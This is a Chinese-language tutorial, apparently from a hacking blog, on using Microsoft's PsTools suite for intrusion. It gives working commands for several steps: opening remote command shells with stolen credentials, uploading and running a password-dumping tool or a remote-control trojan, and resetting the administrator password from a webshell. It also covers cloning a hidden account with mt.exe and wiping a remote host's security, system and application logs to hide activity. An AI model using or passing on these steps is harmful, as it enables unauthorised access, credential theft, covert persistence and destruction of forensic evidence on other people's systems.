其實(shí)接觸pstool很久了，但是據(jù)我觀察用pstools套件在滲透中的應(yīng)用的介紹卻比較少。

當(dāng)然玩bt5的同學(xué)可能常常用到，小菜就寫一篇關(guān)于pstools套件在滲透中的應(yīng)用進(jìn)行詳解。

pstool的介紹

PsTools是Sysinternals Suite中一款排名靠前的一個(gè)安全管理工具套件?，F(xiàn)在被微軟收購(gòu)。目前pstools中含有12款各式各樣的小工具。如果將它們靈活的運(yùn)用，將會(huì)在滲透中收到奇效。所有的pstool第一次運(yùn)行時(shí)都會(huì)彈框?？梢杂猫Caccepteula這個(gè)參數(shù)繞過(guò)。

還有所有的pstool都支持IP$，一旦IP$共享是連接的就不用輸入-u 和-p這兩個(gè)參數(shù)。

如何建立IP$連接。命令如下：

Net user \\目標(biāo)ip\ 密碼 /user:用戶

Net user \\192.168.1.3\ 123456 /user:test

建立后所有的ps工具都將可以不用輸入用戶和密碼了。

其中12款工具簡(jiǎn)介如下：

◆PsExec - 遠(yuǎn)程執(zhí)行進(jìn)程

◆PsFile - 顯示遠(yuǎn)程打開(kāi)的文件

◆PsGetSid - 顯示計(jì)算機(jī)或用戶的 SID

◆PsInfo - 列出有關(guān)系統(tǒng)的信息

◆PsKill - 按名稱或進(jìn)程 ID 終止進(jìn)程

◆PsList - 列出有關(guān)進(jìn)程的詳細(xì)信息

◆PsLoggedOn - 查看在本地通過(guò)資源共享（包含所有資源）登錄的用戶

◆PsLogList - 轉(zhuǎn)儲(chǔ)事件日志記錄

◆PsPasswd － 更改帳戶密碼

◆PsService - 查看和控制服務(wù)

◆PsShutdown - 關(guān)閉并重新啟動(dòng)（可選）計(jì)算機(jī)

◆PsSuspend - 暫停進(jìn)程

這里講對(duì)其中的幾個(gè)工具進(jìn)行詳解，其他的將只介紹用法。

下載地址：http://download.sysinternals.com/files/PSTools.zip

psexec的應(yīng)用詳解

Pstools中最強(qiáng)大最常利用的工具就屬psexec這款工具。這款工具的本意是替代telnet這種不安全的管理方式。它最大的特點(diǎn)就屬無(wú)需安裝客服端程序就可以遠(yuǎn)程操作服務(wù)器。

簡(jiǎn)單來(lái)說(shuō)，就是一旦你知道服務(wù)器或者電腦的用戶名和密碼，你就可以利用它遠(yuǎn)程執(zhí)行系統(tǒng)命令。這樣一款工具放到滲透當(dāng)中真是太淫蕩了。它適用于windows NT/2x/xp/vista

下面介紹詳細(xì)參數(shù)：

-u 遠(yuǎn)程計(jì)算機(jī)的用戶名

-p 遠(yuǎn)程計(jì)算機(jī)用戶對(duì)應(yīng)密碼

-c <[路徑]文件名>:拷貝文件到遠(yuǎn)程機(jī)器并運(yùn)行（注意：運(yùn)行結(jié)束后文件會(huì)自動(dòng)刪除）

-d 不等待程序執(zhí)行完就返回 （意思就是，當(dāng)你執(zhí)行一個(gè)程序無(wú)需等到他結(jié)束才返回信息）

-h用于目標(biāo)系統(tǒng)是Vista或更高版本

其他參數(shù)就不做介紹，這里主要是講用法。

遠(yuǎn)程獲取一個(gè)cmdshell

比如我再滲透中掃描到目標(biāo)機(jī)（192.168.1.3）的一個(gè)用戶名（test）和密碼（123456）。

那我們的命令就是：

psexec \\目標(biāo)ip -u 用戶名 -p 密碼 進(jìn)程名

psexec \\192.168.1.3 –u test –p 123456 cmd.exe

看下圖，這是成功連接到一臺(tái)遠(yuǎn)程服務(wù)器，并獲得一個(gè)cmdshell，shell權(quán)限即位當(dāng)前用戶權(quán)限。

這里還將提到的是由于windows策略，將不允許空密碼登陸。

可能有些機(jī)油對(duì)用戶權(quán)限登陸還有疑慮，什么用戶才可以登陸。

我這建立了一個(gè)屬于guest的一個(gè)用戶我們來(lái)看看它是否能連接。

經(jīng)過(guò)測(cè)試，比guest權(quán)限大的用戶組都可以遠(yuǎn)程登陸。

IIS_WPG用戶組的無(wú)法遠(yuǎn)程連接，但是你不用擔(dān)心，一般屬于IIS_WPG用戶組的用戶一般也屬于guest用戶組。

有關(guān)用戶組相關(guān)的介紹請(qǐng)圍觀法客周年慶之提權(quán)專題

下載地址： http://www.2cto.com/ebook/201211/35554.html

獲取cmdshell的介紹就到這里。一旦獲得一個(gè)cmdshell后面的滲透將會(huì)比較輕松。

經(jīng)過(guò)測(cè)試，用最新版的pstools，windows2008 win7 都能連接成功，win8由于沒(méi)有win8系統(tǒng)，就未測(cè)試，應(yīng)該是能行的，畢竟這是微軟的管理工具。

Win7連接示意圖：

程序上傳并執(zhí)行

首先現(xiàn)在在本地配置一個(gè)將上傳到服務(wù)器上運(yùn)行的程序到H盤根目錄。這里用抓取系統(tǒng)密碼的神器getpass來(lái)演示。H:\getpass.exe

程序上傳并執(zhí)行命令如下：

Psexec \\192.169.1.3 –u test –p 12345 –c H:\getpass.exe –d

最后一個(gè)-d的參數(shù)可有可無(wú)~~~

只是怕程序遠(yuǎn)程運(yùn)行后會(huì)卡住而無(wú)法返回信息。

測(cè)試如圖：

當(dāng)然你也可運(yùn)行一個(gè)遠(yuǎn)控木馬這些都可以~~~

Psexec 的介紹就到這里了。

pspasswd的應(yīng)用詳解

Pspasswd是一個(gè)用來(lái)更改用戶密碼的工具，支持遠(yuǎn)程密碼修改和本地密碼修改。這款工具的特點(diǎn)就是不依靠net,exe程序進(jìn)行密碼修改。

本地修改命令如下：

pspasswd administrator yueyan

演示圖如下：

遠(yuǎn)程命令如下：

pspasswd \\192.168.1.3 –u administrator –p 123456 guest yueyan

命令的意思就是，用administrator這個(gè)管理員賬戶登錄后修改用戶guest的密碼為yueyan

相對(duì)來(lái)說(shuō)本地修改密碼的功能更強(qiáng)大一些。

我這將介紹個(gè)實(shí)例：

我的一個(gè)好基友Lynn得到一個(gè)jsp馬，并且是nt authority\system權(quán)限。但是無(wú)法添加用戶，且無(wú)法用net修改管理員密碼。抓取hash密碼大于14位，LMhash無(wú)效，本地又為搭建彩虹表，網(wǎng)上破解無(wú)果。Hash傳遞登陸被攔截。但是機(jī)油lynn卻一直想用administrator這個(gè)用戶登陸進(jìn)去，當(dāng)然方法還有很多，比如： mimikatz.exe抓取明文密碼等，這里我將介紹pspasswd的妙用。

我們想用administrator這個(gè)賬戶登陸進(jìn)去。很簡(jiǎn)單，直接上傳一個(gè)pspasswd上服務(wù)器。

執(zhí)行下面的命令：

首先執(zhí)行D:\web|pspasswd.exe –accepteula （第一次執(zhí)行，表示許可執(zhí)行的意思）

D:\web|pspasswd.exe administrator yueyan

就會(huì)成功修改administrator的密碼。

這里能修改密碼的原因是pspasswd不是調(diào)用net.exe進(jìn)行密碼修改。

上述介紹常常配合mt.exe進(jìn)行用戶克隆。這里簡(jiǎn)單介紹：

（關(guān)于mt.exe的詳細(xì)介紹請(qǐng)?jiān)L問(wèn)：【工具】mt.exe的詳細(xì)介紹）

首先mt.exe查看用戶sid，比較后看是否有克隆賬戶

Mt -chkuser

比較后，沒(méi)有克隆賬戶，我們選擇guest這個(gè)賬戶進(jìn)行克隆：

Mt –clone administrator guest

然后配合pspasswd修改密碼：

Pspasswd guest yueyan

就這樣成功克隆一個(gè)賬戶，并能成功登陸訪問(wèn)。

Pspasswd的功能就介紹到這里。

pskill+psinfo+pslist的應(yīng)用詳解

首先是介紹pskill.

如果你想遠(yuǎn)程結(jié)束遠(yuǎn)程主機(jī)上的一個(gè)進(jìn)程，你可以使用pskill。

我們就介紹一下常用的命令：

比如我們想遠(yuǎn)程關(guān)閉遠(yuǎn)程主機(jī)正在運(yùn)行的cmd這個(gè)進(jìn)程，可以用pskill進(jìn)行殺掉。命令如下：

pskill \\192.168.1.3 –u test –p 123456 cmd.exe

命令很簡(jiǎn)單~~~~

我再介紹psinfo的相關(guān)應(yīng)用。

基本參數(shù)是：

-h 顯示已經(jīng)安裝的補(bǔ)丁信息

-s 顯示已安裝的軟件信息

-d 顯示磁盤信息

如果我們想看遠(yuǎn)程主機(jī)的基本信息，命令如下：

psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456

接下來(lái)就是pslist。

主要特點(diǎn)是，顯示本地或者遠(yuǎn)程計(jì)算機(jī)的進(jìn)程運(yùn)行情況。

主要參數(shù)：

-m 顯示內(nèi)存信息

-x 顯示進(jìn)程，內(nèi)存和線程

-t 顯示進(jìn)程樹(shù)

-s n 在任務(wù)管理器模式先運(yùn)行，n指定秒，以esc結(jié)束。

-r n 任務(wù)管理器模式刷新速率，n指秒

例如我們想看遠(yuǎn)程計(jì)算機(jī)的進(jìn)程運(yùn)行情況，命令如下：

Pslist –x \\192.168.1.3 –u test –p 123456

效果圖如下：

其他ps工具介紹：

PSLOGGEDON：查看指定計(jì)算機(jī)的本地及遠(yuǎn)程登錄的用戶和登錄時(shí)間。必須建立在IP$共享下才可以使用這個(gè)工具。

命令如下：

Psloggedon –l \\192.168.1.3

PSLOGLIST：事件日志轉(zhuǎn)儲(chǔ)及管理。

這個(gè)對(duì)于滲透測(cè)試是非常有用的，它最大的特點(diǎn)就是遠(yuǎn)程清理系統(tǒng)日志。

常用：

psloglist \\72.56.17.74 application -c > nul

psloglist \\72.56.17.74 system -c > nul

psloglist \\72.56.17.74 security -c > nul

分別是清理應(yīng)用程序日志，系統(tǒng)運(yùn)行日志，安全日志。

PSSERVICE：管理服務(wù)。

常用：

psservice query messenger

查詢messenger服務(wù)的相關(guān)信息。

最重要的項(xiàng)目是：服務(wù)名稱、顯示名稱、服務(wù)描述、服務(wù)類型、服務(wù)狀態(tài)。

psservice config messenger

查詢服務(wù)的配置信息。

最重要的項(xiàng)目是：服務(wù)名稱、服務(wù)描述、服務(wù)類型、服務(wù)啟動(dòng)類型、服務(wù)錯(cuò)誤控制級(jí)別、可執(zhí)行文件的路徑等等。

PSSHUTDOWN：關(guān)機(jī)工具。

常用命令：

Psshutdown –s –t 60

60秒后關(guān)機(jī)。

下面幾個(gè)不常用，就介紹下：

PsFile - 顯示遠(yuǎn)程打開(kāi)的文件

Psfile \\192.168.1.3

PsGetSid - 顯示計(jì)算機(jī)或用戶的 SID

Psgetsid \\192.168.1.3

PsSuspend - 暫停進(jìn)程

Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe

總結(jié)

以上是生活随笔為你收集整理的pstools套件在渗透中的应用详解的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。